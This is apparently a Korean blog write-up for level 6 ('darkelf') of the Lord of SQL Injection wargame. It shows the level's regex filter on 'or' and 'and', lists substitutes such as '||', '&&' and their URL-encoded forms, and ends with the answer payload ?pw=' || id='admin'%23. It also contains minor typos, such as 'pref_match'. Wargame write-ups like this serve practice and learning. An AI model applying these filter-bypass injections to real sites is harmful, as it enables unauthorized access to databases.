300x250
Lord of Sqlinjection - 6번 darkelf
6번 문제는 정규표현식으로 or, and 를 필터링 합니다.
=> if(pref_match('/or|and/i', $_GET[pw])) exit("HeHe");
SQL Injection 공격시 공백 문자 필터링 우회 방법
and => %26&26, &&
or => %7c%7c, ||
* 크롬 테스트 시, && 문자가 적용이 안되는 경우가 있습니다. 이때 %26%26으로 테스트 하시면 정상 적용가능합니다.
대체문자를 이용해서 or, and 필터링을 우회하면 됩니다.
*** 정답 ***
더보기
정답 : ?pw=' || id='admin'%23
반응형
'IT Security' 카테고리의 다른 글
| Lord of SqlInjection - 7번 ORGE (0) | 2019.12.08 |
|---|---|
| Lord of SqlInjection - 8번 TROLL (0) | 2019.12.05 |
| Lord of Sqlinjection - 5번 WOLFMAN (0) | 2019.11.24 |
| Lord of Sqlinjection - 4번 ORC (0) | 2019.11.22 |
| Lord of Sqlinjection - 3번 GOBLIN (0) | 2019.11.19 |